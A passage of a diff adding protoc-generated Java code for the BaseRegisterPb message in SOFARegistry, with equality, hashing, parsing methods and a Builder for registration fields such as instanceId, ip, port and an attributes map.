} + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb other = + (com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb) obj; + + boolean result = true; + result = result && getInstanceId().equals(other.getInstanceId()); + result = result && getZone().equals(other.getZone()); + result = result && getAppName().equals(other.getAppName()); + result = result && getDataId().equals(other.getDataId()); + result = result && getGroup().equals(other.getGroup()); + result = result && getProcessId().equals(other.getProcessId()); + result = result && getRegistId().equals(other.getRegistId()); + result = result && getClientId().equals(other.getClientId()); + result = result && getDataInfoId().equals(other.getDataInfoId()); + result = result && getIp().equals(other.getIp()); + result = result && (getPort() == other.getPort()); + result = result && getEventType().equals(other.getEventType()); + result = result && (getVersion() == other.getVersion()); + result = result && (getTimestamp() == other.getTimestamp()); + result = result && internalGetAttributes().equals(other.internalGetAttributes()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + INSTANCEID_FIELD_NUMBER; + hash = (53 * hash) + getInstanceId().hashCode(); + hash = (37 * hash) + ZONE_FIELD_NUMBER; + hash = (53 * hash) + getZone().hashCode(); + hash = (37 * hash) + APPNAME_FIELD_NUMBER; + hash = (53 * hash) + getAppName().hashCode(); + hash = (37 * hash) + DATAID_FIELD_NUMBER; + hash = (53 * hash) + getDataId().hashCode(); + hash = (37 * hash) + GROUP_FIELD_NUMBER; + hash = (53 * hash) + getGroup().hashCode(); + hash = (37 * hash) + PROCESSID_FIELD_NUMBER; + hash = (53 * hash) + getProcessId().hashCode(); + hash = (37 * hash) + REGISTID_FIELD_NUMBER; + hash = (53 * hash) + getRegistId().hashCode(); + hash = (37 * hash) + CLIENTID_FIELD_NUMBER; + hash = (53 * hash) + getClientId().hashCode(); + hash = (37 * hash) + DATAINFOID_FIELD_NUMBER; + hash = (53 * hash) + getDataInfoId().hashCode(); + hash = (37 * hash) + IP_FIELD_NUMBER; + hash = (53 * hash) + getIp().hashCode(); + hash = (37 * hash) + PORT_FIELD_NUMBER; + hash = (53 * hash) + getPort(); + hash = (37 * hash) + EVENTTYPE_FIELD_NUMBER; + hash = (53 * hash) + getEventType().hashCode(); + hash = (37 * hash) + VERSION_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getVersion()); + hash = (37 * hash) + TIMESTAMP_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getTimestamp()); + if (!internalGetAttributes().getMap().isEmpty()) { + hash = (37 * hash) + ATTRIBUTES_FIELD_NUMBER; + hash = (53 * hash) + internalGetAttributes().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code BaseRegisterPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:BaseRegisterPb) + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass + .internal_static_BaseRegisterPb_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 15: + return internalGetAttributes(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMutableMapField(int number) { + switch (number) { + case 15: + return internalGetMutableAttributes(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass + .internal_static_BaseRegisterPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.class, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + instanceId_ = ""; + + zone_ = ""; + + appName_ = ""; + + dataId_ = ""; + + group_ = ""; + + processId_ = ""; + + registId_ = ""; + + clientId_ = ""; + + dataInfoId_ = ""; + + ip_ = ""; + + port_ = 0; + + eventType_ = ""; + + version_ = 0L; + + timestamp_ = 0L; + + internalGetMutableAttributes().clear(); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass + .internal_static_BaseRegisterPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb build() { + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb result = + new com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.instanceId_ = instanceId_; + result.zone_ = zone_; + result.appName_ = appName_; + result.dataId_ = dataId_; + result.group_ = group_; + result.processId_ = processId_; + result.registId_ = registId_; + result.clientId_ = clientId_; + result.dataInfoId_ = dataInfoId_; + result.ip_ = ip_; + result.port_ = port_; + result.eventType_ = eventType_; + result.version_ = version_; + result.timestamp_ = timestamp_; + result.attributes_ = internalGetAttributes(); + result.attributes_.makeImmutable(); + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance()) + return this; + if (!other.getInstanceId().isEmpty()) { + instanceId_ = other.instanceId_; + onChanged(); + } + if (!other.getZone().isEmpty()) { + zone_ = other.zone_; + onChanged(); + } + if (!other.getAppName().isEmpty()) { + appName_ = other.appName_; + onChanged(); + } + if (!other.getDataId().isEmpty()) { + dataId_ = other.dataId_; + onChanged(); + } + if (!other.getGroup().isEmpty()) { + group_ = other.group_; + onChanged(); + } + if (!other.getProcessId().isEmpty()) { + processId_ = other.processId_; + onChanged(); + } + if (!other.getRegistId().isEmpty()) { + registId_ = other.registId_; + onChanged(); + } + if (!other.getClientId().isEmpty()) { + clientId_ = other.clientId_; + onChanged(); + } + if (!other.getDataInfoId().isEmpty()) { + dataInfoId_ = other.dataInfoId_; + onChanged(); + } + if (!other.getIp().isEmpty()) { + ip_ = other.ip_; + onChanged(); + } + if (other.getPort() != 0) { + setPort(other.getPort()); + } + if (!other.getEventType().isEmpty()) { + eventType_ = other.eventType_; + onChanged(); + } + if (other.getVersion() != 0L) { + setVersion(other.getVersion()); + } + if (other.getTimestamp() != 0L) { + setTimestamp(other.getTimestamp()); + } + internalGetMutableAttributes().mergeFrom(other.internalGetAttributes()); + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.lang.Object instanceId_ = ""; + /** string instanceId = 1; */ + public java.lang.String getInstanceId() { + java.lang.Object ref = instanceId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + instanceId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string instanceId = 1; */ + public com.google.protobuf.ByteString getInstanceIdBytes() { + java.lang.Object ref = instanceId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + instanceId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string instanceId = 1; */ + public Builder setInstanceId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + instanceId_ = value; + onChanged(); + return this; + } + /** string instanceId = 1; */ + public Builder clearInstanceId() { + + instanceId_ = getDefaultInstance().getInstanceId(); + onChanged(); + return this; + } + /** string instanceId = 1; */ + public Builder setInstanceIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + instanceId_ = value; + onChanged(); + return this; + } + + private java.lang.Object zone_ = ""; + /** string zone = 2; */ + public java.lang.String getZone() { + java.lang.Object ref = zone_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + zone_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string zone = 2; */ + public com.google.protobuf.ByteString getZoneBytes() { + java.lang.Object ref = zone_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + zone_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string zone = 2; */ + public Builder setZone(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + zone_ = value; + onChanged(); + return this; + } + /** string zone = 2; */ + public Builder clearZone() { + + zone_ = getDefaultInstance().getZone(); + onChanged(); + return this; + } + /** string zone = 2; */ + public Builder setZoneBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + zone_ = value; + onChanged(); + return this; + } + + private java.lang.Object appName_ = ""; + /** string appName = 3; */ + public java.lang.String getAppName() { + java.lang.Object ref = appName_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + appName_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string appName = 3; */ + public com.google.protobuf.ByteString getAppNameBytes() { + java.lang.Object ref = appName_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + appName_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string appName = 3; */ + public Builder setAppName(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + appName_ = value; + onChanged(); + return this; + } + /** string appName = 3; */ + public Builder clearAppName() { + + appName_ = getDefaultInstance().getAppName(); + onChanged(); + return this; + } + /** string appName = 3; */ + public Builder setAppNameBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + appName_ = value; + onChanged(); + return this; + } + + private java.lang.Object dataId_ = ""; + /** string dataId = 4; */ + public java.lang.String getDataId() { + java.lang.Object ref = dataId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string dataId = 4; */ + public com.google.protobuf.ByteString getDataIdBytes() { + java.lang.Object ref = dataId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string dataId = 4; */ + public Builder setDataId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + dataId_ = value; + onChanged(); + return this; + } + /** string dataId = 4; */ + public Builder clearDataId() { + + dataId_ = getDefaultInstance().getDataId(); + onChanged(); + return this; + } + /** string dataId = 4; */ + public Builder setDataIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + dataId_ = value; + onChanged(); + return this; + } + + private java.lang.Object group_ = ""; + /** string group = 5; */ + public java.lang.String getGroup() { + java.lang.Object ref = group_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + group_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string group = 5; */ + public com.google.protobuf.ByteString getGroupBytes() { + java.lang.Object ref = group_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + group_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string group = 5; */ + public Builder setGroup(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + group_ = value; + onChanged(); + return this; + } + /** string group = 5; */ + public Builder clearGroup() { + + group_ = getDefaultInstance().getGroup(); + onChanged(); + return this; + } + /** string group = 5; */ + public Builder setGroupBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + group_ = value; + onChanged(); + return this; + } + + private java.lang.Object processId_ = ""; + /** string processId = 6; */ + public java.lang.String getProcessId() { + java.lang.Object ref = processId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + processId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string processId = 6; */ + public com.google.protobuf.ByteString getProcessIdBytes() { + java.lang.Object ref = processId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + processId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string processId = 6; */ + public Builder setProcessId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + processId_ = value; + onChanged(); + return this; + } + /** string processId = 6; */ + public Builder clearProcessId() { + + processId_ = getDefaultInstance().getProcessId(); + onChanged(); + return this; + } + /** string processId = 6; */ + public Builder setProcessIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + processId_ = value; + onChanged(); + return this; + } + + private java.lang.Object registId_ = ""; + /** string registId = 7; */ + public java.lang.String getRegistId() { + java.lang.Object ref = registId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + registId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string registId = 7; */ + public com.google.protobuf.ByteString getRegistIdBytes() { + java.lang.Object ref = registId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + registId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string registId = 7; */ + public Builder setRegistId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + registId_ = value; + onChanged(); + return this; + } + /** string registId = 7; */ + public Builder clearRegistId() { + + registId_ = getDefaultInstance().getRegistId(); + onChanged(); + return this; + } + /** string registId = 7; */ + public Builder setRegistIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + registId_ = value; + onChanged(); + return this; + } + + private java.lang.Object clientId_ = ""; + /** string clientId = 8; */ + public java.lang.String getClientId() { + java.lang.Object ref = clientId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + clientId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string clientId = 8; */ + public com.google.protobuf.ByteString getClientIdBytes() { + java.lang.Object ref = clientId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + clientId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string clientId = 8; */ + public Builder setClientId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + clientId_ = value; + onChanged(); + return this; + } + /** string clientId = 8; */ + public Builder clearClientId() { + + clientId_ = getDefaultInstance().getClientId(); + onChanged(); + return this; + } + /** string clientId = 8; */ + public Builder setClientIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + clientId_ = value; + onChanged(); + return this; + } + + private java.lang.Object dataInfoId_ = ""; + /** string dataInfoId = 9; */ + public java.lang.String getDataInfoId() { + java.lang.Object ref = dataInfoId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataInfoId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string dataInfoId = 9; */ + public com.google.protobuf.ByteString getDataInfoIdBytes() { + java.lang.Object ref = dataInfoId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataInfoId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string dataInfoId = 9; */ + public Builder setDataInfoId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + dataInfoId_ = value; + onChanged(); + return this; + } + /** string dataInfoId = 9; */ + public Builder clearDataInfoId() { + + dataInfoId_ = getDefaultInstance().getDataInfoId(); + onChanged(); + return this; + } + /** string dataInfoId = 9; */ + public Builder setDataInfoIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + dataInfoId_ = value; + onChanged(); + return this; + } + + private java.lang.Object ip_ = ""; + /** string ip = 10; */ + public java.lang.String getIp() { + java.lang.Object ref = ip_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + ip_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string ip = 10; */ + public com.google.protobuf.ByteString getIpBytes() { + java.lang.Object ref = ip_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + ip_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string ip = 10; */ + public Builder setIp(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + ip_ = value; + onChanged(); + return this; + } + /** string ip = 10; */ + public Builder clearIp() { + + ip_ = getDefaultInstance().getIp(); + onChanged(); + return this; + } + /** string ip = 10; */ + public Builder setIpBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + ip_ = value; + onChanged(); + return this; + } + + private int port_; + /** int32 port = 11; */ + public int getPort() { + return port_; + } + /** int32 port = 11; */ + public Builder setPort(int value) { + + port_ = value; + onChanged(); + return this; + } + /** int32 port = 11; */ + public Builder clearPort() { + + port_ = 0; + onChanged(); + return this; + } + + private java.lang.Object eventType_ = ""; + /** string eventType = 12; */ + public java.lang.String getEventType() { + java.lang.Object ref = eventType_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + eventType_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string eventType = 12; */ + public com.google.protobuf.ByteString getEventTypeBytes() { + java.lang.Object ref = eventType_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + eventType_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string eventType = 12; */ + public Builder setEventType(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + eventType_ = value; + onChanged(); + return this; + } + /** string eventType = 12; */ + public Builder clearEventType() { + + eventType_ = getDefaultInstance().getEventType(); + onChanged(); + return this; + } + /** string eventType = 12; */ + public Builder setEventTypeBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + eventType_ = value; + onChanged(); + return this; + } + + private long version_; + /** int64 version = 13; */ + public long getVersion() { + return version_; + } + /** int64 version = 13; */ + public Builder setVersion(long value) { + + version_ = value; + onChanged(); + return this; + } + /** int64 version = 13; */ + public Builder clearVersion() { + + version_ = 0L; + onChanged(); + return this; + } + + private long timestamp_; + /** int64 timestamp = 14; */ + public long getTimestamp() { + return timestamp_; + } + /** int64 timestamp = 14; */ + public Builder setTimestamp(long value) { + + timestamp_ = value; + onChanged(); + return this; + } + /** int64 timestamp = 14; */ + public Builder clearTimestamp() { + + timestamp_ = 0L; + onChanged(); + return this; + } + + private com.google.protobuf.MapField attributes_; + + private com.google.protobuf.MapField + internalGetAttributes() { + if (attributes_ == null) { + return com.google.protobuf.MapField.emptyMapField( + AttributesDefaultEntryHolder.defaultEntry); + } + return attributes_; + } + + private com.google.protobuf.MapField + internalGetMutableAttributes() { + onChanged(); + ; + if (attributes_ == null) { + attributes_ = + com.google.protobuf.MapField.newMapField(AttributesDefaultEntryHolder.defaultEntry); + } + if (!attributes_.isMutable()) { + attributes_ = attributes_.copy(); + } + return attributes_; + } + + public int getAttributesCount() { + return internalGetAttributes().getMap().size(); + } + /** map<string, string> attributes = 15; */ + public boolean containsAttributes(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetAttributes().getMap().containsKey(key); + } + /** Use {@link #getAttributesMap()} instead. */ + @java.lang.Deprecated + public java.util.Map getAttributes() { + return getAttributesMap(); + } + /** map<string, string> attributes = 15; */ + public java.util.Map getAttributesMap() { + return internalGetAttributes().getMap(); + } + /** map<string, string> attributes = 15; */ + public java.lang.String getAttributesOrDefault( + java.lang.String key, java.lang.String defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = internalGetAttributes().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, string> attributes = 15; */ + public java.lang.String getAttributesOrThrow(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = internalGetAttributes().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearAttributes() { + internalGetMutableAttributes().getMutableMap().clear(); + return this; + } + /** map<string, string> attributes = 15; */ + public Builder removeAttributes(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableAttributes().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map getMutableAttributes() { + return internalGetMutableAttributes().getMutableMap(); + } + /** map<string, string> attributes = 15; */ + public Builder putAttributes(java.lang.String key, java.lang.String value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableAttributes().getMutableMap().put(key, value); + return this; + } + /** map<string, string> attributes = 15; */ + public Builder putAllAttributes(java.util.Map values) { + internalGetMutableAttributes().getMutableMap().putAll(values); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:BaseRegisterPb) + } + + // @@protoc_insertion_point(class_scope:BaseRegisterPb) + private static final com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public BaseRegisterPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new BaseRegisterPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb + 